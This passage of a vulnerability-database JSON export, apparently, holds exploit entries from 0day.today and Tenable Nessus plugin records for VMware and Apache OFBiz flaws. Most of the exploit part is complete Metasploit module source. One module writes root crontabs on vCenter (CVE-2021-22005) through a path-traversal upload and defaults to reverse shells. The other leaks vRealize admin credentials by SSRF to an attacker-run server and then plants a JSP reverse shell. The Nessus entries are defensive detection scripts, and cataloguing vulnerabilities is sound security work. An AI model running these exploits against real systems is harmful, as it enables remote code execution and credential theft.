<cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj>\n </map-Key>\n <map-Value>\n <std-String value=\"http://#{Faker::Internet.domain_name}\"/>\n </map-Value>\n </map-Entry>\n </map-HashMap>\n </ser>\n </soapenv:Body>\n </soapenv:Envelope>\n XML\n )\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36080", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:46:10", "description": "This Metasploit module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. 
CEIP is enabled by default.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "zdt", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-07T00:00:00", "id": "1337DAY-ID-36874", "href": "https://0day.today/exploit/description/36874", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to 
be exploitable by\n this module. CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n 
unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36874", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:46:49", "description": "This Metasploit module exploits a pre-auth server-side request forgery (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. 
CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-27T00:00:00", "type": "zdt", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "1337DAY-ID-36160", "href": "https://0day.today/exploit/description/36160", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 
'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested against 8.0.1.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? 
CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n 
fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36160", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "nessus": [{"lastseen": "2023-06-01T14:24:17", "description": "A remote code execution vulnerability exists in Apache OFBiz prior to 17.12.06 due to Deserialization of Untrusted Data.\nAn unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands on the target system.", "cvss3": {}, "published": "2021-03-30T00:00:00", "type": "nessus", "title": "Apache OFBiz Remote Code Execution (CVE-2021-26295)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26295"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:apache:ofbiz"], "id": "APACHE_OFBIZ_CVE-2021-26295.NBIN", "href": "https://www.tenable.com/plugins/nessus/148239", "sourceData": "Binary data apache_ofbiz_cve-2021-26295.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:21:15", "description": "An arbitrary file upload vulnerability exists in vCenter Server. 
An unauthenticated, remote attacker with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.", "cvss3": {}, "published": "2021-10-06T00:00:00", "type": "nessus", "title": "VMware vCenter Server Arbitrary File Upload (VMSA-2021-0020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-22005.NBIN", "href": "https://www.tenable.com/plugins/nessus/153889", "sourceData": "Binary data vmware_vcenter_cve-2021-22005.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:45", "description": "The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to 7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, 8.1.0 prior to 8.1.1.17772462, 8.2.0 prior to 8.2.0.17771778, or 8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by multiple vulnerabilities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server-Side Request Forgery attack to steal administrative credentials. 
(CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying Photon operating system. (CVE-2021-21983)", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "nessus", "title": "VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL", "href": "https://www.tenable.com/plugins/nessus/148255", "sourceData": "# (C) Tenable Network Security, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148255);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-21975\", \"CVE-2021-21983\");\n script_xref(name:\"VMSA\", value:\"2021-0004\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0019\");\n\n script_name(english:\"VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"VMware vRealize Operations running on the remote host is affected by a Server Side\nRequest Forgery and Arbitrary File Write vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to\n7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or\n8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. 
\n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side\n request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write\n files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vRealize Operations Manager version\n7.5.0.17771878, 8.0.1.17771851, 8.1.1.17772462, 8.2.0.17771778, 8.3.0.17787340 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21983\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21975\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vRealize Operations (vROps) Manager SSRF RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n script_require_keys(\"installed_sw/vRealize Operations Manager\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'vRealize Operations Manager';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n {'min_version':'7.5.0', 'fixed_version':'7.5.0.17771878'},\n {'min_version':'8.0.0', 'fixed_version':'8.0.1.17771851'}, # For 8.0.0, 8.0.1\n {'min_version':'8.1.0', 'fixed_version':'8.1.1.17772462'}, # For 8.1.0, 8.1.1\n {'min_version':'8.2.0', 'fixed_version':'8.2.0.17771778'},\n {'min_version':'8.3.0', 'fixed_version':'8.3.0.17787340'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:46:11", "description": "The version of VMware vCenter Server installed on the remote host is 7.0 prior to 7.0 U2c. It is, therefore, affected by multiple vulnerabilities:\n\n - An arbitrary file upload vulnerability exists in the analytics service of vSphere Server. An unauthenticated, remote attacker can exploit this to upload arbitrary files on the remote host and execute code using a specially crafted file. (CVE-2021-22005)\n\n - A privilege escalation vulnerability exists in vCenter Server due to the way it handles session tokens. An authenticated, local attacker can exploit this to gain unauthorized access to the system. (CVE-2021-21991, CVE-2021-22015)\n\n - A reverse proxy bypass vulnerability exists in vCenter Server due to the way the endpoints handle the URI. 
An unauthenticated, remote attacker can exploit this to gain unauthorized access to restricted endpoints.\n (CVE-2021-22006) \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.", "cvss3": {}, "published": "2021-09-22T00:00:00", "type": "nessus", "title": "VMware vCenter Server < 7.0 U2c Multiple Vulnerabilities (VMSA-2021-0020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22005", "CVE-2021-22006", "CVE-2021-22007", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22014", "CVE-2021-22015", "CVE-2021-22019", "CVE-2021-22020"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_70_U2C_VMSA-2021-0020.NASL", "href": "https://www.tenable.com/plugins/nessus/153545", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153545);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21991\",\n \"CVE-2021-21992\",\n \"CVE-2021-21993\",\n \"CVE-2021-22005\",\n \"CVE-2021-22006\",\n \"CVE-2021-22007\",\n \"CVE-2021-22008\",\n \"CVE-2021-22009\",\n \"CVE-2021-22010\",\n \"CVE-2021-22014\",\n \"CVE-2021-22015\",\n \"CVE-2021-22019\",\n \"CVE-2021-22020\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0434\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0045\");\n\n script_name(english:\"VMware vCenter Server < 7.0 U2c Multiple Vulnerabilities (VMSA-2021-0020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by multiple 
vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 7.0 prior to 7.0 U2c. It is, therefore, affected\n by multiple vulnerabilities:\n\n - An arbitrary file upload vulnerability exists in the analytics service of vSphere Server. An \n unauthenticated, remote attacker can exploit this to upload arbitrary files on the remote host \n and execute code using a specially crafted file. (CVE-2021-22005)\n\n - A privilege escalation vulnerability exists in vCenter Server due to the way it handles session tokens. \n An authenticated, local attacker can exploit this to gain unauthorized access to the system. \n (CVE-2021-21991, CVE-2021-22015)\n\n - A reverse proxy bypass vulnerability exists in vCenter Server due to the way the endpoints handle the URI. \n An unauthenticated, remote attacker can exploit this to gain unauthorized access to restricted endpoints.\n (CVE-2021-22006) \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber. 
Nessus has also not tested for the presence of a workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 7.0 U2c or later or apply the workaround mentioned in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22014\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22005\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vCenter Server Analytics (CEIP) Service File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\nvar fixes = make_array(\n '7.0', '18356314' # 7.0 U2c\n);\n\nvar port = get_kb_item_or_exit('Host/VMware/vCenter');\nvar version = get_kb_item_or_exit('Host/VMware/version');\nvar release = get_kb_item_or_exit('Host/VMware/release');\n\n# Extract and verify the build number\nvar build = ereg_replace(pattern:\"^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$\", string:release, replace:\"\\1\");\nif (build !~ \"^[0-9]+$\") audit(AUDIT_UNKNOWN_BUILD, 'VMware vCenter 7.0');\n\nvar match = pregmatch(pattern:\"^VMware vCenter ([0-9]+\\.[0-9]+).*$\", string:version);\nif (isnull(match)) audit(AUDIT_OS_NOT, 'VMware vCenter 7.0');\n\nvar ver = match[1];\nif (ver !~ \"^7\\.0$\") audit(AUDIT_OS_NOT, 'VMware vCenter 7.0');\n\nvar fixed_build = int(fixes[ver]);\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nrelease = release - 'VMware vCenter Server ';\nif (build >= fixed_build)\n audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nvar report = '\\n VMware vCenter version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:46:25", "description": "The version of VMware vCenter Server installed on the remote host is 6.7 prior to 6.7 U3o. It is, therefore, affected by multiple vulnerabilities:\n\n - A privilege escalation vulnerability exists in vCenter Server due to the way it handles session tokens. An authenticated, local attacker can exploit this to gain unauthorized access to the system. 
(CVE-2021-21991, CVE-2021-22015)\n\n - A reverse proxy bypass vulnerability exists in vCenter Server due to the way the endpoints handle the URI. An unauthenticated, remote attacker can exploit this to gain unauthorized access to restricted endpoints.\n (CVE-2021-22006) \n\n - An rhttproxy bypass vulnerability exists in vCenter Server due to improper implementation of URI normalization. An unauthenticated, remote attacker can exploit this to gain access to internal endpoints. (CVE-2021-22017)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.", "cvss3": {}, "published": "2021-09-22T00:00:00", "type": "nessus", "title": "VMware vCenter Server < 6.7 Multiple Vulnerabilities (VMSA-2021-0020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22005", "CVE-2021-22006", "CVE-2021-22007", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22011", "CVE-2021-22014", "CVE-2021-22015", "CVE-2021-22016", "CVE-2021-22017", "CVE-2021-22019", "CVE-2021-22020"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_67_U3O_VMSA-2021-0020.NASL", "href": "https://www.tenable.com/plugins/nessus/153544", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153544);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21991\",\n \"CVE-2021-21992\",\n \"CVE-2021-21993\",\n \"CVE-2021-22005\",\n 